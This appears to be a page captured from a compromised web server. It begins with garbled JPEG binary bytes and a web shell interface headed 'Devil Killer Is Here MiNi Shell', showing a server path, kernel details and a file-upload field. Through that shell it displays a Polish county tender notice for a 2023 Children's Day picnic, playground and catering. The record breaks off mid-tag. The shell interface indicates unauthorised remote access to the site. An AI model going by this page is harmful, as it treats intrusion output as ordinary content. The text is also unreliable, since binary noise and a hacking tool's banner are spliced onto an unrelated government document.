JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230406/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230406/0016695101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Część 1 Organizacja i przeprowadzenie pikniku integracyjnego pn. Międzynarodowy Dzień Dziecka Część 2 Zapewnienie placu zabaw na pikniku integracyjnym pn. Międzynarodowy Dzień Dziecka Część 3.... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWE CENTRUM POMOCY RODZINIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291099620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wiśniowa 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włoszczowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">29-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pcpr_wloszczowa@o2.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pcprwloszczowa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka organizacyjna administracji samorządowej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pozostała pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Część 1 Organizacja i przeprowadzenie pikniku integracyjnego pn. Międzynarodowy Dzień Dziecka Część 2 Zapewnienie placu zabaw na pikniku integracyjnym pn. Międzynarodowy Dzień Dziecka Część 3.... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dfc05d2f-d43e-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00166951</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00029043/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Międzynarodowy Dzień Dziecka</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Regionalny Program Operacyjny Województwa Świętokrzyskiego na lata 2014-2020, Oś Priorytetowa 9. Włączenie społeczne i walka z ubóstwem, Działanie 9.1 Aktywna integracja zwiększająca szanse na zatrudnienie </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_wloszczowa <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy<br/>zakupowej https://platformazakupowa.pl/pn/powiat_wloszczowa , Zamawiający dopuszcza a<br/>komunikację za pośrednictwem poczty elektronicznej: pcpr_wloszczowa@o2.pl<br/>Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się<br/>na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">.Komunikacja w postępowaniu w tym<br/>składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z<br/>uwzględnieniem wyjątków<br/>określonych w ustawie pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej<br/>rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r. poz. 123 i 730).<br/>2.Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 pzp., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie<br/>podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, doc, .docx, .odt. Ofertę, a także<br/>oświadczenie, o jakim mowa w Rozdziale 5 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.<br/>3.W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy<br/>zakupowej https://platformazakupowa.pl/pn/powiat_wloszczowa ,<br/>Zamawiający dopuszcza komunikację przy użyciu poczty elektronicznej pcpr_wloszczowa@o2.pl (z zastrzeżeniem, że oferta musi<br/>zostać złożona zgodnie z zasadami określonymi w rozdziale 8 SWZ).<br/>4.Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych (Dz. U. z<br/>2017 r. poz. 1320), określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: 1) stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje, 3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10 0., 4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca przetwarzania danych osobowych<br/>stanowi załącznik nr 5 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PCPR-RPO-3601/1/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 Organizacja i przeprowadzenie pikniku integracyjnego pn. Międzynarodowy Dzień Dziecka <br/><br/>w ramach projektu pn. „Świętokrzyskie dla Ukrainy” współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020, Oś Priorytetowa 9. Włączenie społeczne i walka z ubóstwem, Działanie 9.1 Aktywna integracja zwiększająca szanse na zatrudnienie.<br/><br/>Przedmiot zamówienia obejmuje organizację i przeprowadzenie pikniku integracyjnego dalej „piknik” dla około 300 osób w ramach projektu pn. „Świętokrzyskie dla Ukrainy” w dniu 28 maja 2023 r. w godzinach: 15.00 – 19.00.<br/>Miejsce realizacji przedmiotu zamówienia:<br/>- teren przy Powiatowym Centrum Kulturalno – Rekreacyjnym we Włoszczowie, ul. Koniecpolska 42 - w sytuacji dobrych warunków pogodowych <br/>albo <br/>- hala Powiatowego Centrum Kulturalno – Rekreacyjnym we Włoszczowie, ul. Koniecpolska 42 - w sytuacji złych warunków pogodowych (deszcz, silny wiatr, itp.).<br/>Zorganizowanie i przeprowadzenie zabaw animacyjnych i edukacyjnych podczas pikniku odbędzie się zgodnie z zaproponowanym przez Wykonawcę i zaakceptowanym przez Zamawiającego harmonogramem. Atrakcje będą adresowane dla dzieci w wieku od 2 do 16 lat.<br/>W związku z powyższym, Wykonawca zapewni:<br/>1.	Stanowiska animacyjne dla dzieci: min. 6 plastikowych stoliczków dla dzieci, 30 krzesełek dla dzieci, min. 6 parasoli przeciwsłonecznych. Sprzęt powinien być czysty, zadbany, bez żadnych usterek, parasole muszą być stabilne, niezagrażające zdrowiu i życiu uczestników i bezpiecznie przymocowane do podłoża.<br/>2.	Doświadczony zespół animacyjny (min. 10 osób, prowadzących animacje w godz. 15:00 – 19:00), który zorganizuje następujące atrakcje: <br/>a) Robienie wielkich baniek mydlanych.<br/>b) Wykonywanie figur z dmuchanych balonów.<br/>c) Zabawy chustą animacyjną.<br/>d) Malowanie rękami eko-farbami np. na szarym kartonie.<br/>e) Stemplowanie, przygotowywanie origami lub inne twórcze zajęcia edukacyjne.<br/>f) Mini-olimpiada sportowa (zadania sprawnościowe dla dzieci i młodzieży takie jak: wyścigi <br/>w workach, rzut do celu, tor przeszkód).<br/>Wykonawca zapewni nagrody za 3 pierwsze miejsca w poszczególnych 3 konkurencjach, tj. 1 miejsce: piłka do siatkówki, 2 miejsce: zestaw do tenisa stołowego duo free 2 rakietki i 3 piłki, 3 miejsce: komplet lampek rowerowych (przód + tył). <br/>g) Min. 2 gigantyczne gry planszowe i plenerowe, np. mega szachy, chińczyk gigant, kręgle, klocki, itp.<br/>Wykonawca przedstawi szczegółowy program animacji do akceptacji Zamawiającego najpóźniej w dniu podpisania umowy.<br/>Wykonawca zapewni uregulowanie wszelkich opłat wymaganych z tytułu praw autorskich i praw pokrewnych, w tym opłacenie ZAIKS, a także kosztów pokrewnych zgodnie z przepisami obowiązującego prawa (w tym Ustawy o prawie autorskim i prawach pokrewnych) materiałów wykorzystywanych przez Wykonawcę podczas trwania całej imprezy.<br/>W celu dobrej identyfikacji, zespół animacyjny powinien być ubrany w jednolite koszulki (np. z napisem ANIMATOR). Stroje powinny być czyste, schludne, bez logotypów producenta. Zaopatrzenie zespołu animacyjnego w materiały niezbędne do prowadzenia ww. animacji leży po stronie Wykonawcy.<br/>Wszystkie materiały używane przez zespół animacyjny powinny posiadać atesty bezpieczeństwa.<br/>Wykonawca zapewni Konferansjera podczas trwania całej imprezy. Osoba ta, korzystając z nagłośnionej przestrzeni scenicznej, będzie informowała uczestników o kolejnych punktach programu i atrakcjach, które będą się odbywać na terenie pikniku. <br/>Konferansjerem może być didżej, o którym mowa poniżej lub jeden z animatorów, o których mowa powyżej.<br/>Wykonawca zapewni didżeja, którego zadaniem będzie zabawianie uczestników pikniku w przerwach wolnych od konkursów, zajęć, prezentacji w godzinach trwania imprezy. Powinna być grana muzyka popularna, rozrywkowa, dostosowana do odbiorców czyli dzieci (bez użycia wulgaryzmów).<br/>Wykonawca zapewni tłumacza celem przedstawiania przekazywanych treści w języku ukraińskim.<br/>Wykonawca zapewni uczestnikom ubezpieczenie od następstw nieszczęśliwych wypadków (NNW).<br/>Wykonawca jest zobowiązany do posiadania ubezpieczenia OC. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79952000-2 - Usługi w zakresie organizacji imprez</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone na<br/>podstawie kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 Zapewnienie placu zabaw na pikniku integracyjnym pn. Międzynarodowy Dzień Dziecka <br/>w ramach projektu pn. „Świętokrzyskie dla Ukrainy” współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020, Oś Priorytetowa 9. Włączenie społeczne i walka z ubóstwem, Działanie 9.1 Aktywna integracja zwiększająca szanse na zatrudnienie.<br/><br/>Przedmiot zamówienia obejmuje zapewnienie dmuchanego placu zabaw dla dzieci na pikniku integracyjnym w dniu 28 maja 2023 r. w godzinach: 15.00 – 19.00, składającego się z co najmniej: <br/>•	Dużej zjeżdżalni o wymiarach: długość 11 m, szerokość 6m, wysokość 9 m;<br/>•	Zadaszonego suchego basenu z kulkami o wymiarach 5 m x 5 m, wysokość 3 m;<br/>•	Małej zjeżdżalni dla dzieci w wieku 1-5 lat o wymiarach: 3m x 5m , wysokość 5 m;<br/>•	Zamek dmuchany 4,5 m x 4,5 m wysokość 3 m <br/><br/>Zamawiający dopuszcza tolerancję względem podanych wymiarów +/- 80 cm.<br/><br/>oraz stanowiska (wraz z zapewnieniem animatora) malowania twarzy i wykonywania zmywalnych tatuaży oraz zaplatania kolorowych warkoczyków<br/><br/>Miejsce realizacji przedmiotu zamówienia:<br/>- teren przy Powiatowym Centrum Kulturalno – Rekreacyjnym we Włoszczowie, ul. Koniecpolska 42 - w sytuacji dobrych warunków pogodowych <br/>albo <br/>- hala Powiatowego Centrum Kulturalno – Rekreacyjnym we Włoszczowie, ul. Koniecpolska 42 - w sytuacji złych warunków pogodowych (deszcz, silny wiatr, itp.).<br/>W sytuacji złych warunków pogodowych (deszcz, silny wiatr, itp.) Zamawiający zastrzega sobie prawo do rezygnacji z:<br/>•	Zadaszonego suchego basenu z kulkami;<br/>•	Zamku dmuchananego. <br/><br/>W takim przypadku wynagrodzenie Wykonawcy zostanie zmniejszone o wartość w/w atrakcji. <br/>Wykonawcy z tego tytułu nie przysługują żadne roszczenia.<br/><br/>Wykonawca zobowiązany będzie do wykonywania wszelkich działań związanych z realizacją zamówienia zgodnie z przepisami BHP. Do realizacji wyżej wymienionych zadań Wykonawca winien dysponować odpowiednim sprzętem, odpowiednio wykwalifikowaną kadrą wykonującą starannie i priorytetowo obowiązki związane z obsługą techniczną oraz wykonywaniem wszystkich atrakcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79952000-2 - Usługi w zakresie organizacji imprez</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone na<br/>podstawie kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 Zapewnienie punktów małej gastronomii na pikniku integracyjnym pn. Międzynarodowy Dzień Dziecka<br/>w ramach projektu pn. „Świętokrzyskie dla Ukrainy” współfinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2014-2020, Oś Priorytetowa 9. Włączenie społeczne i walka z ubóstwem, Działanie 9.1 Aktywna integracja zwiększająca szanse na zatrudnienie.<br/><br/>Zapewnienie bezpłatnego poczęstunku dla dzieci w ramach zorganizowanych punktów małej gastronomii w dniu 28.05.2023 r. w godz. od 15.00 do 19.00 w następujących ilościach oraz formie:<br/>a) wata cukrowa – 300 porcji; skład: cukier 100%<br/>b) popcorn (min. 30 g.)– 300 porcji; skład: kukurydza (85%), olej rzepakowy, sól (1,6%)<br/>c) woda mineralna niegazowana – 300 butelek (0,5 L)<br/>d) kiełbaska wiejska pieczona na grillu (skład: min. 95 % mięsa wieprzowego, osłonka naturalna, waga 200g.- 1 porcja, zawartość i skład potwierdzony etykietą) wraz z dodatkami (keczup, musztarda) i pieczywo (2 kromki chleba jasnego albo bułka), podana na papierowym talerzyku wraz ze sztućcami, – 300 porcji każdego produktu<br/><br/>Miejsce realizacji przedmiotu zamówienia:<br/>- teren przy Powiatowym Centrum Kulturalno – Rekreacyjnym we Włoszczowie, ul. Koniecpolska 42 - w sytuacji dobrych warunków pogodowych <br/>albo <br/>- hala Powiatowego Centrum Kulturalno – Rekreacyjnym we Włoszczowie, ul. Koniecpolska 42 - w sytuacji złych warunków pogodowych (deszcz, silny wiatr, itp.). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 